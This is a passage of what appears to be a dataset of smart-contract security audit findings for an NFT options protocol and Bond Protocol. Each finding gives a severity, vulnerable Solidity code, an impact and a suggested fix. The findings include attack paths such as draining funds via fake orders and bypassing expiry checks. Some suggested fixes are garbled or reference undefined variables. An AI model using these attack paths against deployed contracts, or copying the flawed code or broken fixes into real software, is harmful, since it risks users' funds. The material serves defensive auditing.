If the transfer doesn't succeed, it transfers the NFT into the contract, and sets `withdrawableCollectionTokenId` so that the specific NFT is attributed to the bull for later withdrawal.\\nHowever, assuming the bull isn't an upgradeable contract, this withdrawal will never be possible, because their only option is to call the same function `safeTransferFrom` to the same contract address, which will fail in the same way.\\n```\\nfunction withdrawToken(bytes32 orderHash, uint tokenId) public {\\n address collection = matchedOrders[uint(orderHash)].collection;\\n\\n address recipient = withdrawableCollectionTokenId[collection][tokenId];\\n\\n // Transfer NFT to recipient\\n IERC721(collection).safeTransferFrom(address(this), recipient, tokenId);\\n\\n // This token is not withdrawable anymore\\n withdrawableCollectionTokenId[collection][tokenId] = address(0);\\n\\n emit WithdrawnToken(orderHash, tokenId, recipient);\\n}\\n```\\nчThere are a few possible solutions:\\nAdd a `to` field in the `withdrawToken` function, which allows the bull `to` withdraw the NFT `to` another address\\nCreate a function similar `to` `transferPosition` that can be used `to` transfer owners of a withdrawable NFT\\nDecide that you want `to` punish bulls who aren't able `to` receive NFTs, in which case there is no need `to` save their address or implement a `withdrawToken` functionчIf a bull is a contract that can't receive NFTs, their orders will be matched, the bear will be able to withdraw their assets, but the bull's NFT will remain stuck in the BVB protocol contract.ч```\\ntry IERC721(order.collection).safeTransferFrom(bear, bull, tokenId) {}\\ncatch (bytes memory) {\\n // Transfer NFT to BvbProtocol\\n IERC721(order.collection).safeTransferFrom(bear, address(this), tokenId);\\n // Store that the bull has to retrieve it\\n withdrawableCollectionTokenId[order.collection][tokenId] = bull;\\n}\\n\\nuint bearAssetAmount = order.premium + order.collateral;\\nif (bearAssetAmount > 0) {\\n // 
Transfer payment tokens to the Bear\\n IERC20(order.asset).safeTransfer(bear, bearAssetAmount);\\n}\\n```\\n -Attackers can use `reclaimContract()` to transfer assets in protocol to address(0)чhighч`reclaimContract()` would transfer payment tokens to `bulls[contractId]`. An attacker can make `reclaimContract()` transfer assets to address(0).\\nAn attacker can use a fake order to trick `reclaimContract()`. The fake order needs to meet the following requirements:\\n`block.timestamp > order.expiry`.\\n`!settledContracts[contractId]`.\\n`!reclaimedContracts[contractId],`.\\nThe first one is easy to fulfilled, an attacker can decide the content of the fake order. And the others are all satisfied since the fake order couldn't be settled or reclaimed before.\\n```\\n function reclaimContract(Order calldata order) public nonReentrant {\\n bytes32 orderHash = hashOrder(order);\\n\\n // ContractId\\n uint contractId = uint(orderHash);\\n\\n address bull = bulls[contractId];\\n\\n // Check that the contract is expired\\n require(block.timestamp > order.expiry, \"NOT_EXPIRED_CONTRACT\");\\n\\n // Check that the contract is not settled\\n require(!settledContracts[contractId], \"SETTLED_CONTRACT\");\\n\\n // Check that the contract is not reclaimed\\n require(!reclaimedContracts[contractId], \"RECLAIMED_CONTRACT\");\\n\\n uint bullAssetAmount = order.premium + order.collateral;\\n if (bullAssetAmount > 0) {\\n // Transfer payment tokens to the Bull\\n IERC20(order.asset).safeTransfer(bull, bullAssetAmount);\\n }\\n\\n reclaimedContracts[contractId] = true;\\n\\n emit ReclaimedContract(orderHash, order);\\n }\\n```\\nчThere are multiple solutions for this problem.\\ncheck `bulls[contractId] != address(0)`\\ncheck the order is matched `matchedOrders[contractId].maker != address(0)`чAn attacker can use this vulnerability to transfer assets from BvB to address(0). 
It results in serious loss of funds.ч```\\n function reclaimContract(Order calldata order) public nonReentrant {\\n bytes32 orderHash = hashOrder(order);\\n\\n // ContractId\\n uint contractId = uint(orderHash);\\n\\n address bull = bulls[contractId];\\n\\n // Check that the contract is expired\\n require(block.timestamp > order.expiry, \"NOT_EXPIRED_CONTRACT\");\\n\\n // Check that the contract is not settled\\n require(!settledContracts[contractId], \"SETTLED_CONTRACT\");\\n\\n // Check that the contract is not reclaimed\\n require(!reclaimedContracts[contractId], \"RECLAIMED_CONTRACT\");\\n\\n uint bullAssetAmount = order.premium + order.collateral;\\n if (bullAssetAmount > 0) {\\n // Transfer payment tokens to the Bull\\n IERC20(order.asset).safeTransfer(bull, bullAssetAmount);\\n }\\n\\n reclaimedContracts[contractId] = true;\\n\\n emit ReclaimedContract(orderHash, order);\\n }\\n```\\n -Transferring Ownership Might Break The MarketчmediumчAfter the transfer of the market ownership, the market might stop working, and no one could purchase any bond token from the market leading to a loss of sale for the market makers.\\nThe `callbackAuthorized` mapping contains a list of whitelisted market owners authorized to use the callback. When the users call the `purchaseBond` function, it will check at Line 390 if the current market owner is still authorized to use a callback. 
Otherwise, the function will revert.\\n```\\nFile: BondBaseSDA.sol\\n function purchaseBond(\\n uint256 id_,\\n uint256 amount_,\\n uint256 minAmountOut_\\n ) external override returns (uint256 payout) {\\n if (msg.sender != address(_teller)) revert Auctioneer_NotAuthorized();\\n\\n BondMarket storage market = markets[id_];\\n BondTerms memory term = terms[id_];\\n\\n // If market uses a callback, check that owner is still callback authorized\\n if (market.callbackAddr != address(0) && !callbackAuthorized[market.owner])\\n revert Auctioneer_NotAuthorized();\\n```\\n\\nHowever, if the market owner transfers the market ownership to someone else. The market will stop working because the new market owner might not be on the list of whitelisted market owners (callbackAuthorized mapping). As such, no one can purchase any bond token.\\n```\\nFile: BondBaseSDA.sol\\n function pushOwnership(uint256 id_, address newOwner_) external override {\\n if (msg.sender != markets[id_].owner) revert Auctioneer_OnlyMarketOwner();\\n newOwners[id_] = newOwner_;\\n }\\n```\\nчBefore pushing the ownership, if the market uses a callback, implement an additional validation check to ensure that the new market owner has been whitelisted to use the callback. 
This will ensure that transferring the market ownership will not break the market due to the new market owner not being whitelisted.\\n```\\nfunction pushOwnership(uint256 id_, address newOwner_) external override {\\n if (msg.sender != markets[id_].owner) revert Auctioneer_OnlyMarketOwner();\\n// Add the line below\\n if (markets[id_].callbackAddr != address(0) && !callbackAuthorized[newOwner_])\\n// Add the line below\\n revert newOwnerNotAuthorizedToUseCallback();\\n newOwners[id_] = newOwner_;\\n}\\n```\\nчAfter the transfer of the market ownership, the market might stop working, and no one could purchase any bond token from the market leading to a loss of sale for the market makers.ч```\\nFile: BondBaseSDA.sol\\n function purchaseBond(\\n uint256 id_,\\n uint256 amount_,\\n uint256 minAmountOut_\\n ) external override returns (uint256 payout) {\\n if (msg.sender != address(_teller)) revert Auctioneer_NotAuthorized();\\n\\n BondMarket storage market = markets[id_];\\n BondTerms memory term = terms[id_];\\n\\n // If market uses a callback, check that owner is still callback authorized\\n if (market.callbackAddr != address(0) && !callbackAuthorized[market.owner])\\n revert Auctioneer_NotAuthorized();\\n```\\n -Market Price Lower Than ExpectedчmediumчThe market price does not conform to the specification documented within the whitepaper. As a result, the computed market price is lower than expected.\\nThe following definition of the market price is taken from the whitepaper. Taken from Page 13 of the whitepaper - Definition 25\\n\\nThe integer implementation of the market price must be rounded up per the whitepaper. 
This ensures that the integer implementation of the market price is greater than or equal to the real value of the market price so as to protect makers from selling tokens at a lower price than expected.\\nWithin the `BondBaseSDA.marketPrice` function, the computation of the market price is rounded up in Line 688, which conforms to the specification.\\n```\\nFile: BondBaseSDA.sol\\n function marketPrice(uint256 id_) public view override returns (uint256) {\\n uint256 price = currentControlVariable(id_).mulDivUp(currentDebt(id_), markets[id_].scale);\\n\\n return (price > markets[id_].minPrice) ? price : markets[id_].minPrice;\\n }\\n```\\n\\nHowever, within the `BondBaseSDA._currentMarketPrice` function, the market price is rounded down, resulting in the makers selling tokens at a lower price than expected.\\n```\\nFile: BondBaseSDA.sol\\n function _currentMarketPrice(uint256 id_) internal view returns (uint256) {\\n BondMarket memory market = markets[id_];\\n return terms[id_].controlVariable.mulDiv(market.totalDebt, market.scale);\\n }\\n```\\nчEnsure the market price is rounded up so that the desired property can be achieved and the makers will not be selling tokens at a lower price than expected.\\n```\\nfunction _currentMarketPrice(uint256 id_) internal view returns (uint256) {\\n BondMarket memory market = markets[id_];\\n// Remove the line below\\n return terms[id_].controlVariable.mulDiv(market.totalDebt, market.scale);\\n// Add the line below\\n return terms[id_].controlVariable.mulDivUp(market.totalDebt, market.scale);\\n}\\n```\\nчLoss for the makers as their tokens are sold at a lower price than expected.\\nAdditionally, the affected `BondBaseSDA._currentMarketPrice` function is used within the `BondBaseSDA._decayAndGetPrice` function to derive the market price. Since a lower market price will be returned, this will lead to a higher amount of payout tokens. 
Subsequently, the `lastDecayIncrement` will be higher than expected, which will lead to a lower `totalDebt`. Lower debt means a lower market price will be computed later.ч```\\nFile: BondBaseSDA.sol\\n function marketPrice(uint256 id_) public view override returns (uint256) {\\n uint256 price = currentControlVariable(id_).mulDivUp(currentDebt(id_), markets[id_].scale);\\n\\n return (price > markets[id_].minPrice) ? price : markets[id_].minPrice;\\n }\\n```\\n -Teller Cannot Be Removed From Callback ContractчmediumчIf a vulnerable Teller is being exploited by an attacker, there is no way for the owner of the Callback Contract to remove the vulnerable Teller from their Callback Contract.\\nThe Callback Contract is missing the feature to remove a Teller. Once a Teller has been added to the whitelist (approvedMarkets mapping), it is not possible to remove the Teller from the whitelist.\\n```\\nFile: BondBaseCallback.sol\\n /* ========== WHITELISTING ========== */\\n\\n /// @inheritdoc IBondCallback\\n function whitelist(address teller_, uint256 id_) external override onlyOwner {\\n // Check that the market id is a valid, live market on the aggregator\\n try _aggregator.isLive(id_) returns (bool live) {\\n if (!live) revert Callback_MarketNotSupported(id_);\\n } catch {\\n revert Callback_MarketNotSupported(id_);\\n }\\n\\n // Check that the provided teller is the teller for the market ID on the stored aggregator\\n // We could pull the teller from the aggregator, but requiring the teller to be passed in\\n // is more explicit about which contract is being whitelisted\\n if (teller_ != address(_aggregator.getTeller(id_))) revert Callback_TellerMismatch();\\n\\n approvedMarkets[teller_][id_] = true;\\n }\\n```\\nчConsider implementing an additional function to allow the removal of a Teller from the whitelist (approvedMarkets mapping), so that a vulnerable Teller can be removed swiftly if needed.\\n```\\nfunction removeFromWhitelist(address teller_, uint256 id_) external 
override onlyOwner {\\n approvedMarkets[teller_][id_] = false;\\n}\\n```\\n\\nNote: Although the owner of the Callback Contract can DOS its own market by abusing the `removeFromWhitelist` function, no sensible owner would do so.чIn the event that a whitelisted Teller is found to be vulnerable and has been actively exploited by an attacker in the wild, the owner of the Callback Contract needs to mitigate the issue swiftly by removing the vulnerable Teller from the Callback Contract to stop it from draining the asset within the Callback Contract. However, the mitigation effort will be hindered by the fact there is no way to remove a Teller within the Callback Contract once it has been whitelisted. Thus, it might not be possible to stop the attacker from exploiting the vulnerable Teller to drain assets within the Callback Contract. The Callback Contract owners would need to find a workaround to block the attack, which will introduce an unnecessary delay to the recovery process where every second counts.\\nAdditionally, if the owner accidentally whitelisted the wrong Teller, there is no way to remove it.ч```\\nFile: BondBaseCallback.sol\\n /* ========== WHITELISTING ========== */\\n\\n /// @inheritdoc IBondCallback\\n function whitelist(address teller_, uint256 id_) external override onlyOwner {\\n // Check that the market id is a valid, live market on the aggregator\\n try _aggregator.isLive(id_) returns (bool live) {\\n if (!live) revert Callback_MarketNotSupported(id_);\\n } catch {\\n revert Callback_MarketNotSupported(id_);\\n }\\n\\n // Check that the provided teller is the teller for the market ID on the stored aggregator\\n // We could pull the teller from the aggregator, but requiring the teller to be passed in\\n // is more explicit about which contract is being whitelisted\\n if (teller_ != address(_aggregator.getTeller(id_))) revert Callback_TellerMismatch();\\n\\n approvedMarkets[teller_][id_] = true;\\n }\\n```\\n -`BondAggregator.findMarketFor` Function 
Will Break In Certain Conditionsчmediumч`BondAggregator.findMarketFor` function will break when the `BondBaseSDA.payoutFor` function within the for-loop reverts under certain conditions.\\nThe `BondBaseSDA.payoutFor` function will revert if the computed payout is larger than the market's max payout. Refer to Line 711 below.\\n```\\nFile: BondBaseSDA.sol\\n function payoutFor(\\n uint256 amount_,\\n uint256 id_,\\n address referrer_\\n ) public view override returns (uint256) {\\n // Calculate the payout for the given amount of tokens\\n uint256 fee = amount_.mulDiv(_teller.getFee(referrer_), 1e5);\\n uint256 payout = (amount_ - fee).mulDiv(markets[id_].scale, marketPrice(id_));\\n\\n // Check that the payout is less than or equal to the maximum payout,\\n // Revert if not, otherwise return the payout\\n if (payout > markets[id_].maxPayout) {\\n revert Auctioneer_MaxPayoutExceeded();\\n } else {\\n return payout;\\n }\\n }\\n```\\n\\nThe `BondAggregator.findMarketFor` function will call the `BondBaseSDA.payoutFor` function at Line 245. The `BondBaseSDA.payoutFor` function will revert if the final computed payout is larger than the `markets[id_].maxPayout` as mentioned earlier. This will cause the entire for-loop to \"break\" and the transaction to revert.\\nAssume that the user configures the `minAmountOut_` to be `0`, then the condition `minAmountOut_ <= maxPayout` Line 244 will always be true. The `amountIn_` will always be passed to the `payoutFor` function. 
In some markets where the computed payout is larger than the market's max payout, the `BondAggregator.findMarketFor` function will revert.\\n```\\nFile: BondAggregator.sol\\n /// @inheritdoc IBondAggregator\\n function findMarketFor(\\n address payout_,\\n address quote_,\\n uint256 amountIn_,\\n uint256 minAmountOut_,\\n uint256 maxExpiry_\\n ) external view returns (uint256) {\\n uint256[] memory ids = marketsFor(payout_, quote_);\\n uint256 len = ids.length;\\n uint256[] memory payouts = new uint256[](len);\\n\\n uint256 highestOut;\\n uint256 id = type(uint256).max; // set to max so an empty set doesn't return 0, the first index\\n uint48 vesting;\\n uint256 maxPayout;\\n IBondAuctioneer auctioneer;\\n for (uint256 i; i < len; ++i) {\\n auctioneer = marketsToAuctioneers[ids[i]];\\n (, , , , vesting, maxPayout) = auctioneer.getMarketInfoForPurchase(ids[i]);\\n\\n uint256 expiry = (vesting <= MAX_FIXED_TERM) ? block.timestamp + vesting : vesting;\\n\\n if (expiry <= maxExpiry_) {\\n payouts[i] = minAmountOut_ <= maxPayout\\n ? payoutFor(amountIn_, ids[i], address(0))\\n : 0;\\n\\n if (payouts[i] > highestOut) {\\n highestOut = payouts[i];\\n id = ids[i];\\n }\\n }\\n }\\n\\n return id;\\n }\\n```\\nчConsider using try-catch or address.call to handle the revert of the `BondBaseSDA.payoutFor` function within the for-loop gracefully. This ensures that a single revert of the `BondBaseSDA.payoutFor` function will not affect the entire for-loop within the `BondAggregator.findMarketFor` function.чThe find market feature within the protocol is broken under certain conditions. As such, users would not be able to obtain the list of markets that meet their requirements. 
The market makers affected by this issue will lose the opportunity to sell their bond tokens.ч```\\nFile: BondBaseSDA.sol\\n function payoutFor(\\n uint256 amount_,\\n uint256 id_,\\n address referrer_\\n ) public view override returns (uint256) {\\n // Calculate the payout for the given amount of tokens\\n uint256 fee = amount_.mulDiv(_teller.getFee(referrer_), 1e5);\\n uint256 payout = (amount_ - fee).mulDiv(markets[id_].scale, marketPrice(id_));\\n\\n // Check that the payout is less than or equal to the maximum payout,\\n // Revert if not, otherwise return the payout\\n if (payout > markets[id_].maxPayout) {\\n revert Auctioneer_MaxPayoutExceeded();\\n } else {\\n return payout;\\n }\\n }\\n```\\n -Debt Decay Faster Than ExpectedчmediumчThe debt decay at a rate faster than expected, causing market makers to sell bond tokens at a lower price than expected.\\nThe following definition of the debt decay reference time following any purchases at time `t` taken from the whitepaper. The second variable, which is the delay increment, is rounded up. Following is taken from Page 15 of the whitepaper - Definition 27\\n\\nHowever, the actual implementation in the codebase differs from the specification. 
At Line 514, the delay increment is rounded down instead.\\n```\\nFile: BondBaseSDA.sol\\n // Set last decay timestamp based on size of purchase to linearize decay\\n uint256 lastDecayIncrement = debtDecayInterval.mulDiv(payout_, lastTuneDebt);\\n metadata[id_].lastDecay += uint48(lastDecayIncrement);\\n```\\nчWhen computing the `lastDecayIncrement`, the result should be rounded up.\\n```\\n// Set last decay timestamp based on size of purchase to linearize decay\\n// Remove the line below\\n uint256 lastDecayIncrement = debtDecayInterval.mulDiv(payout_, lastTuneDebt);\\n// Add the line below\\n uint256 lastDecayIncrement = debtDecayInterval.mulDivUp(payout_, lastTuneDebt);\\nmetadata[id_].lastDecay // Add the line below\\n= uint48(lastDecayIncrement);\\n```\\nчWhen the delay increment (TD) is rounded down, the debt decay reference time increment will be smaller than expected. The debt component will then decay at a faster rate. As a result, the market price will not be adjusted in an optimized manner, and the market price will fall faster than expected, causing market makers to sell bond tokens at a lower price than expected.\\nFollowing is taken from Page 8 of the whitepaper - Definition 8\\nч```\\nFile: BondBaseSDA.sol\\n // Set last decay timestamp based on size of purchase to linearize decay\\n uint256 lastDecayIncrement = debtDecayInterval.mulDiv(payout_, lastTuneDebt);\\n metadata[id_].lastDecay += uint48(lastDecayIncrement);\\n```\\n -Fixed Term Bond tokens can be minted with non-rounded expiryчmediumчFixed Term Tellers intend to mint tokens that expire once per day, to consolidate liquidity and create a uniform experience. However, this rounding is not enforced on the external `deploy()` function, which allows for tokens expiring at unexpected times.\\nIn `BondFixedTermTeller.sol`, new tokenIds are deployed through the `_handlePayout()` function. 
The function calculates the expiry (rounded down to the nearest day), uses this expiry to create a tokenId, and — if that tokenId doesn't yet exist — deploys it.\\n```\\n// rest of code\\nexpiry = ((vesting_ + uint48(block.timestamp)) / uint48(1 days)) * uint48(1 days);\\n\\n// Fixed-term user payout information is handled in BondTeller.\\n// Teller mints ERC-1155 bond tokens for user.\\nuint256 tokenId = getTokenId(payoutToken_, expiry);\\n\\n// Create new bond token if it doesn't exist yet\\nif (!tokenMetadata[tokenId].active) {\\n _deploy(tokenId, payoutToken_, expiry);\\n}\\n// rest of code\\n```\\n\\nThis successfully consolidates all liquidity into one daily tokenId, which expires (as expected) at the time included in the tokenId.\\nHowever, if the `deploy()` function is called directly, no such rounding occurs:\\n```\\nfunction deploy(ERC20 underlying_, uint48 expiry_)\\n external\\n override\\n nonReentrant\\n returns (uint256)\\n{\\n uint256 tokenId = getTokenId(underlying_, expiry_);\\n // Only creates token if it does not exist\\n if (!tokenMetadata[tokenId].active) {\\n _deploy(tokenId, underlying_, expiry_);\\n }\\n return tokenId;\\n}\\n```\\n\\nThis creates a mismatch between the tokenId time and the real expiry time, as tokenId is calculated by rounding the expiry down to the nearest day:\\n```\\nuint256 tokenId = uint256(\\n keccak256(abi.encodePacked(underlying_, expiry_ / uint48(1 days)))\\n);\\n```\\n\\n... 
while the `_deploy()` function saves the original expiry:\\n```\\ntokenMetadata[tokenId_] = TokenMetadata(\\n true,\\n underlying_,\\n uint8(underlying_.decimals()),\\n expiry_,\\n 0\\n);\\n```\\nчInclude the same rounding process in `deploy()` as is included in _handlePayout():\\n```\\nfunction deploy(ERC20 underlying_, uint48 expiry_)\\n external\\n override\\n nonReentrant\\n returns (uint256)\\n {\\n expiry = ((vesting_ + uint48(block.timestamp)) / uint48(1 days)) * uint48(1 days);\\n uint256 tokenId = getTokenId(underlying_, expiry_);\\n // rest of code\\n```\\nчThe `deploy()` function causes a number of issues:\\nTokens can be deployed that don't expire at the expected daily time, which may cause issues with your front end or break user's expectations\\nTokens can expire at times that don't align with the time included in the tokenId\\nMalicious users can pre-deploy tokens at future timestamps to \"take over\" the token for a given day and lock it at a later time stamp, which then \"locks in\" that expiry time and can't be changed by the protocolч```\\n// rest of code\\nexpiry = ((vesting_ + uint48(block.timestamp)) / uint48(1 days)) * uint48(1 days);\\n\\n// Fixed-term user payout information is handled in BondTeller.\\n// Teller mints ERC-1155 bond tokens for user.\\nuint256 tokenId = getTokenId(payoutToken_, expiry);\\n\\n// Create new bond token if it doesn't exist yet\\nif (!tokenMetadata[tokenId].active) {\\n _deploy(tokenId, payoutToken_, expiry);\\n}\\n// rest of code\\n```\\n -Fixed Term Teller tokens can be created with an expiry in the pastчhighчThe Fixed Term Teller does not allow tokens to be created with a timestamp in the past. This is a fact that protocols using this feature will expect to hold and build their systems around. 
However, users can submit expiry timestamps slightly in the future, which correlate to tokenIds in the past, which allows them to bypass this check.\\nIn `BondFixedTermTeller.sol`, the `create()` function allows protocols to trade their payout tokens directly for bond tokens. The expectation is that protocols will build their own mechanisms around this. It is explicitly required that they cannot do this for bond tokens that expire in the past, only those that have yet to expire:\\n```\\nif (expiry_ < block.timestamp) revert Teller_InvalidParams();\\n```\\n\\nHowever, because tokenIds round timestamps down to the latest day, protocols are able to get around this check.\\nHere's an example:\\nThe most recently expired token has an expiration time of 1668524400 (correlates to 9am this morning)\\nIt is currently 1668546000 (3pm this afternoon)\\nA protocol calls create() with an expiry of 1668546000 + 1\\nThis passes the check that `expiry_ >= block.timestamp`\\nWhen the expiry is passed to `getTokenId()` it rounds the time down to the latest day, which is the day corresponding with 9am this morning\\nThis expiry associated with this tokenId is 9am this morning, so they are able to redeem their tokens instantlyчBefore checking whether `expiry_ < block.timestamp`, expiry should be rounded to the nearest day:\\n```\\nexpiry = ((vesting_ + uint48(block.timestamp)) / uint48(1 days)) * uint48(1 days);\\n```\\nчProtocols can bypass the check that all created tokens must have an expiry in the future, and mint tokens with a past expiry that can be redeemed immediately.\\nThis may not cause a major problem for Bond Protocol itself, but protocols will be building on top of this feature without expecting this behavior.\\nLet's consider, for example, a protocol that builds a mechanism where users can stake some asset, and the protocol will trade payout tokens to create bond tokens for them at a discount, with the assumption that they will expire in the future. 
This issue could create an opening for a savvy user to stake, mint bond tokens, redeem and dump them immediately, buy more assets to stake, and continue this cycle to earn arbitrage returns and tank the protocol's token.\\nBecause there are a number of situations like the one above where this issue could lead to a major loss of funds for a protocol building on top of Bond, I consider this a high severity.ч```\\nif (expiry_ < block.timestamp) revert Teller_InvalidParams();\\n```\\n -findMarketFor() missing check minAmountOut_чmediumчBondAggregator#findMarketFor() minAmountOut_ does not actually take effect,may return a market's \"payout\" smaller than minAmountOut_ , Causes users to waste gas calls to purchase\\nBondAggregator#findMarketFor() has check minAmountOut_ <= maxPayout but the actual \"payout\" by \"amountIn_\" no check greater than minAmountOut_\\n```\\n function findMarketFor(\\n address payout_,\\n address quote_,\\n uint256 amountIn_,\\n uint256 minAmountOut_,\\n uint256 maxExpiry_\\n ) external view returns (uint256) {\\n// rest of code\\n if (expiry <= maxExpiry_) {\\n payouts[i] = minAmountOut_ <= maxPayout\\n ? payoutFor(amountIn_, ids[i], address(0))\\n : 0;\\n\\n if (payouts[i] > highestOut) {//****@audit not check payouts[i] >= minAmountOut_******//\\n highestOut = payouts[i];\\n id = ids[i];\\n }\\n }\\n```\\nч```\\n function findMarketFor(\\n address payout_,\\n address quote_,\\n uint256 amountIn_,\\n uint256 minAmountOut_,\\n uint256 maxExpiry_\\n ) external view returns (uint256) {\\n// rest of code\\n if (expiry <= maxExpiry_) {\\n payouts[i] = minAmountOut_ <= maxPayout\\n ? 
payoutFor(amountIn_, ids[i], address(0))\\n : 0;\\n\\n- if (payouts[i] > highestOut) {\\n+ if (payouts[i] >= minAmountOut_ && payouts[i] > highestOut) {\\n highestOut = payouts[i];\\n id = ids[i];\\n }\\n }\\n```\\nчThe user gets the optimal market through BondAggregator#findMarketFor(), but incorrectly returns a market smaller than minAmountOut_, and the call to purchase must fail, resulting in wasted gasч```\\n function findMarketFor(\\n address payout_,\\n address quote_,\\n uint256 amountIn_,\\n uint256 minAmountOut_,\\n uint256 maxExpiry_\\n ) external view returns (uint256) {\\n// rest of code\\n if (expiry <= maxExpiry_) {\\n payouts[i] = minAmountOut_ <= maxPayout\\n ? payoutFor(amountIn_, ids[i], address(0))\\n : 0;\\n\\n if (payouts[i] > highestOut) {//****@audit not check payouts[i] >= minAmountOut_******//\\n highestOut = payouts[i];\\n id = ids[i];\\n }\\n }\\n```\\n -Existing Circuit Breaker Implementation Allow Faster Taker To Extract Payout Tokens From MarketчmediumчThe current implementation of the circuit breaker is not optimal. Thus, the market maker will lose an excessive amount of payout tokens if a quoted token suddenly loses a large amount of value, even with a circuit breaker in place.\\nWhen the amount of the payout tokens purchased by the taker exceeds the `term.maxDebt`, the taker is still allowed to carry on with the transaction, and the market will only be closed after the current transaction is completed.\\n```\\nFile: BondBaseSDA.sol\\n // Circuit breaker. 
If max debt is breached, the market is closed\\n if (term.maxDebt < market.totalDebt) {\\n _close(id_);\\n } else {\\n // If market will continue, the control variable is tuned to to expend remaining capacity over remaining market duration\\n _tune(id_, currentTime, price);\\n }\\n```\\n\\nAssume that the state of the SDAM at T0 is as follows:\\n`term.maxDebt` is 110 (debt buffer = 10%)\\n`maxPayout` is 100\\n`market.totalDebt` is 99\\nAssume that the quoted token suddenly loses a large amount of value (e.g. stablecoin depeg causing the quote token to drop to almost zero). Bob decided to purchase as many payout tokens as possible before reaching the `maxPayout` limit to maximize the value he could extract from the market. Assume that Bob is able to purchase 50 bond tokens at T1 before reaching the `maxPayout` limit. As such, the state of the SDAM at T1 will be as follows:\\n`term.maxDebt` = 110\\n`maxPayout` = 100\\n`market.totalDebt` = 99 + 50 = 149\\nIn the above scenario, Bob's purchase has already breached the `term.maxDebt` limit. However, he could still purchase the 50 bond tokens in the current transaction.чConsidering only allowing takers to purchase bond tokens up to the `term.maxDebt` limit.\\nFor instance, based on the earlier scenario, only allow Bob to purchase up to 11 bond tokens (term.maxDebt[110] - market.totalDebt[99]) instead of allowing him to purchase 50 bond tokens.\\nIf Bob attempts to purchase 50 bond tokens, the market can proceed to purchase the 11 bond tokens for Bob, and the remaining quote tokens can be refunded back to Bob. After that, since the `term.maxDebt (110) == market.totalDebt (110)`, the market can trigger the circuit breaker to close the market to protect the market from potential extreme market conditions.\\nThis ensures that bond tokens beyond the `term.maxDebt` limit would not be sold to the taker during extreme market conditions.чIn the event that the price of the quote token falls to almost zero (e.g. 
0.0001 dollars), then the fastest taker will be able to extract as many payout tokens as possible before reaching the `maxPayout` limit from the market. The extracted payout tokens are essentially free for the fastest taker. Taker gain is maker loss.\\nAdditionally, in the event that a quoted token suddenly loses a large amount of value, the amount of payout tokens lost by the market marker is capped at the `maxPayout` limit instead of capping the loss at the `term.maxDebt` limit. This resulted in the market makers losing more payout tokens than expected, and their payout tokens being sold to the takers at a very low price (e.g. 0.0001 dollars).\\nThe market makers will suffer more loss if the `maxPayout` limit of their markets is higher.ч```\\nFile: BondBaseSDA.sol\\n // Circuit breaker. If max debt is breached, the market is closed\\n if (term.maxDebt < market.totalDebt) {\\n _close(id_);\\n } else {\\n // If market will continue, the control variable is tuned to to expend remaining capacity over remaining market duration\\n _tune(id_, currentTime, price);\\n }\\n```\\n -Create Fee Discount Feature Is BrokenчmediumчThe create fee discount feature is found to be broken within the protocol.\\nThe create fee discount feature relies on the `createFeeDiscount` state variable to determine the fee to be discounted from the protocol fee. However, it was observed that there is no way to initialize the `createFeeDiscount` state variable. 
As a result, the `createFeeDiscount` state variable will always be zero.\\n```\\nFile: BondFixedExpiryTeller.sol\\n // If fee is greater than the create discount, then calculate the fee and store it\\n // Otherwise, fee is zero.\\n if (protocolFee > createFeeDiscount) {\\n // Calculate fee amount\\n uint256 feeAmount = amount_.mulDiv(protocolFee - createFeeDiscount, FEE_DECIMALS);\\n rewards[_protocol][underlying_] += feeAmount;\\n\\n // Mint new bond tokens\\n bondToken.mint(msg.sender, amount_ - feeAmount);\\n\\n return (bondToken, amount_ - feeAmount);\\n } else {\\n // Mint new bond tokens\\n bondToken.mint(msg.sender, amount_);\\n\\n return (bondToken, amount_);\\n }\\n```\\n\\n```\\nFile: BondFixedTermTeller.sol\\n // If fee is greater than the create discount, then calculate the fee and store it\\n // Otherwise, fee is zero.\\n if (protocolFee > createFeeDiscount) {\\n // Calculate fee amount\\n uint256 feeAmount = amount_.mulDiv(protocolFee - createFeeDiscount, FEE_DECIMALS);\\n rewards[_protocol][underlying_] += feeAmount;\\n\\n // Mint new bond tokens\\n _mintToken(msg.sender, tokenId, amount_ - feeAmount);\\n\\n return (tokenId, amount_ - feeAmount);\\n } else {\\n // Mint new bond tokens\\n _mintToken(msg.sender, tokenId, amount_);\\n\\n return (tokenId, amount_);\\n }\\n```\\nчImplement a setter method for the `createFeeDiscount` state variable and the necessary verification checks.\\n```\\nfunction setCreateFeeDiscount(uint48 createFeeDiscount_) external requiresAuth {\\n if (createFeeDiscount_ > protocolFee) revert Teller_InvalidParams();\\n if (createFeeDiscount_ > 5e3) revert Teller_InvalidParams();\\n createFeeDiscount = createFeeDiscount_;\\n}\\n```\\nчThe create fee discount feature is broken within the protocol. There is no way for the protocol team to configure a discount for the users of the `BondFixedExpiryTeller.create` and `BondFixedTermTeller.create` functions. 
As such, the users will not obtain any discount from the protocol when using the create function.ч```\\nFile: BondFixedExpiryTeller.sol\\n // If fee is greater than the create discount, then calculate the fee and store it\\n // Otherwise, fee is zero.\\n if (protocolFee > createFeeDiscount) {\\n // Calculate fee amount\\n uint256 feeAmount = amount_.mulDiv(protocolFee - createFeeDiscount, FEE_DECIMALS);\\n rewards[_protocol][underlying_] += feeAmount;\\n\\n // Mint new bond tokens\\n bondToken.mint(msg.sender, amount_ - feeAmount);\\n\\n return (bondToken, amount_ - feeAmount);\\n } else {\\n // Mint new bond tokens\\n bondToken.mint(msg.sender, amount_);\\n\\n return (bondToken, amount_);\\n }\\n```\\n -Auctioneer Cannot Be Removed From The ProtocolчmediumчIf a vulnerable Auctioneer is being exploited by an attacker, there is no way to remove the vulnerable Auctioneer from the protocol.\\nThe protocol is missing the feature to remove an auctioneer. Once an auctioneer has been added to the whitelist, it is not possible to remove the auctioneer from the whitelist.\\n```\\nFile: BondAggregator.sol\\n function registerAuctioneer(IBondAuctioneer auctioneer_) external requiresAuth {\\n // Restricted to authorized addresses\\n\\n // Check that the auctioneer is not already registered\\n if (_whitelist[address(auctioneer_)])\\n revert Aggregator_AlreadyRegistered(address(auctioneer_));\\n\\n // Add the auctioneer to the whitelist\\n auctioneers.push(auctioneer_);\\n _whitelist[address(auctioneer_)] = true;\\n }\\n```\\nчConsider implementing an additional function to allow the removal of an Auctioneer from the whitelist, so that vulnerable Auctioneer can be removed swiftly if needed.\\n```\\nfunction deregisterAuctioneer(IBondAuctioneer auctioneer_) external requiresAuth {\\n // Remove the auctioneer from the whitelist\\n _whitelist[address(auctioneer_)] = false;\\n}\\n```\\nчIn the event that a whitelisted Auctioneer is found to be vulnerable and has been actively 
